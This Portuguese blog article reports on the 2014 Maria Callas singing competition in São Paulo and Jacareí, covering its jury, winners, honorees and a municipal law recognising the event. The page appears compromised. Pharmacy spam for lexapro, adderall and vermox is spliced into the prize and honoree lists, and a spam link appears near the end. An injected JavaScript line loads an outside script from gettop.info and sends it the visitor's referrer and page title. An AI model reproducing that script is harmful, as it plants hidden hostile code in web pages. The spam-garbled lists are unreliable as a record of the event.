Artigo

Festival Maria Callas 2014 consolida sua realização com méritos

O Concurso foi realizado com o apoio do Ministério da Cultura, Governo do Estado de São Paulo e Prefeitura Municipal de Jacareí, patrocinado pela SABESP.

O 12º Concurso Brasileiro de Canto Maria Callas, realizado entre 30 de março e 5 de abril, contou com 55 inscritos de 12 Estados brasileiros (São Paulo, Rio Grande do Sul, Pará, Goiás, Rio de Janeiro, Paraná, Sergipe, Minas Gerais, Espírito Santo, Bahia e Distrito Federal).

Banca de jurados
Formada por importantes nomes da cena lírica internacional, entre diretores de teatros, críticos e cantores.

Presidente
Giovanna Lomazzi (Itália) – Vice-Presidente e Diretora de Elenco da AsLiCo-Associazione Lírica Concertistica Italiana / Teatro Sociale de Como

Vogais
Dimitra Theodossiou (Grécia) – Soprano com carreira nos principais teatros de ópera do mundo
Richard Martet (França) – Redator Chefe da Revista Opera Magazine de Paris, crítico e escritor
Maria Angélica Ojeda Sanhueza (Chile) – Gerente executiva do Festival Internacional de Ópera Laguna Mágica de San Pedro de La Paz
Dalva Esper Nader  (Brasil) – Soprano com carreira em vários teatros do país  e membro da Comissão Artística da Cia Ópera São Paulo em Jacareí
Alejandro Abrante (Espanha) – Empresário, Coordenador artístico da Ópera de Tenerife
Maurizio Colasanti (Itália) – Regente, Diretor Musical e Artístico do Festival de Ópera da Coreia do Sul, Sociedade Italiana da Música e da Orquestra UEL (Universidade Estadual de Londrina).

A fase eliminatória, realizada nos dias 30 e 31 de março no Theatro São Pedro, em São Paulo, classificou 19 candidatos, que foram a Jacareí, para realização da fase semifinal que aprovou 11 cantores à final e encerrou com 9 vencedores, para o Recital de Vencedores, na Câmara Municipal de Jacareí, no dia 5 de abril.

 

Cheap Prêmios:

– Elisa Machado (Soprano) RS  –  1º Grande Prêmio Absoluto
– Carla Domingues (Soprano) SC   –  Prêmio Especial de Público
– Hudson Ayres (Tenor) GO  –  Prêmio Ópera: Conde de Almaviva
– Aníbal Mancini (Tenor) RJ  –  Prêmio Ópera: Conde de Almaviva
– Johnny França (Barítono) SP   –  Prêmio Ópera: Fígaro
– Jorge Trabanco (Barítono) SP  –  Prêmio Ópera: Fígaro
– Meghan Dawson (Mezzo-soprano) EUA   –  Prêmio Ópera: Rosina
– Aline Lobão (Mezzo-soprano) MG   –  Prêmio Ópera: Rosina
– Gustavo Lassen (Baixo) SP  –  Prêmio Ópera: Don Basílio

 

Dentro da programação do Festival Callas 2014, foi realizado o Recital de Abertura do 12º Concurso Brasileiro de Canto Maria Callas, no Theatro São Pedro, com a soprano grega Dimitra Theodossiou e participação de Richard Buer (tenor) e Ana Lúcia Benedetti (mezzo-soprano) –ambos vencedores do Concurso Maria Callas – e acompanhados ao piano por Carlos Morejano.

A cerimônia de abertura, realizada no dia 1 de abril, foi marcada com a tradicional homenagem que a CIA Ópera São Paulo faz aos profissionais e mecenas do mundo da ópera no Brasil, este ano os que receberam a placa foram:

online – Sérgio Casoy (Professor, escritor, pesquisador e radialista)
Mauro Wrona (Tenor, maestro e diretor cênico)
Cheap lexapro online consultation Bea Esteve adderall canadian pharmacy online (Mecenas)
Purchase Sebastião Teixeira (Barítono)

 

Este ano, O Concurso Brasileiro de Canto Maria Callas, consolidou sua existência. Durante a realização do evento, um projeto de lei foi aprovado na Câmara Municipal de Jacareí (SP) incluindo o Maria Callas no Calendário Oficial da cidade, fazendo parte das festividades oficiais do Município. “Senti-me realizado com o reconhecimento dado ao Concurso Brasileiro de Canto Maria Callas.” Paulo Abrão Esper – Diretor Artísitico

O trabalho da Cia Ópera São Paulo é dedicado à cultura e ao jovem profissional de nosso país. Desenvolvemos projetos para auxiliar no crescimento destes novos talentos e colocá-los no mercado de trabalho.

A empresa trabalha sempre em parceria com os governos Federais, Estaduais e Municipais, por meio de suas leis de incentivo à cultura. Este bom relacionamento permite à Cia importantes relações com estatais e empresas privadas.

 

Anexo I –Decreto de Lei

Concurso Maria Callas entra para calendário oficial da cidade

online Projeto de Lei, de autoria dos vereadores Hernani Barreto e Arildo Batista, ambos do PT, foi aprovado por unanimidade nesta quarta-feira (26) pela Câmara Municipal

O Concurso Brasileiro de Canto Maria Callas, cujas fases semifinal e final são realizadas na cidade, acaba de entrar para o Calendário Oficial de Jacareí. A iniciativa de incluir o evento nas festividades oficiais do município foi dos vereadores Hernani Barreto e Arildo Batista, ambos do PT. O Projeto de Lei que institui a nova regra foi aprovado por unanimidade pela Câmara Municipal nesta quarta-feira (26).

“Com esta lei temos mais uma vez a oportunidade de valorizar a cultura em nossa cidade, além de fazer uma justa homenagem a esse concurso, que tem destaque nacional e internacional e, certamente, dará mais visibilidade à Jacareí quando se trata de cultura de alto nível”, disse Hernani Barreto.

Segundo os autores do PL, esta também é uma forma de projetar ainda mais nossa cidade como berço de promissores talentos, além de concretizar a função do município como referência cultural, ainda mais com a inauguração do EducaMais Parque dos Sinos, que deverá sediar os concertos a partir deste ano.

“Jacareí é um berço de grandes artistas e produz muitos talentos . A aprovação deste projeto certamente realça um evento que é de grande magnitude, mas também valoriza a classe artística local e eterniza o concurso na história de nossa cidade”, acrescentou o vereador Arildo Batista.

 

Histórico

O Concurso Maria Callas começou a ser realizado em 1993 por iniciativa da Companhia de Ópera São Paulo, criada pelo tenor jacareiense Paulo Abrão Esper. A intenção primordial de Paulo Esper, reconhecido cantor lírico, produtor e diretor artístico, foi a de descentralizar a realização de eventos deste estilo musical, ampliando, desta forma, os espaço para os talentos brasileiros vindos dos vários cantos do país.

Desde o começo, o concurso é composto por bancas julgadoras formadas por grandes nomes da cena lírica internacional, como Magda Olivero, Fedora Barbieri, Luigi Alva, entre outros. Além disso, ele já revelou importantes nomes, sendo motivo de orgulho para a comissão organizadora a descoberta de novos talentos e o encorajamento dos jovens para a prática lírica.

Assessoria Vereador Hernani Barreto (PT)

http://osfatundent.com/2018/02/02/vermox-rezeptfrei-online-bestellen/ Assessoria de Comunicação
Câmara Municipal de Jacareí
12 3955 – 2235 / 12 3955 – 2238
redacao@camarajacarei.sp.gov.br

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.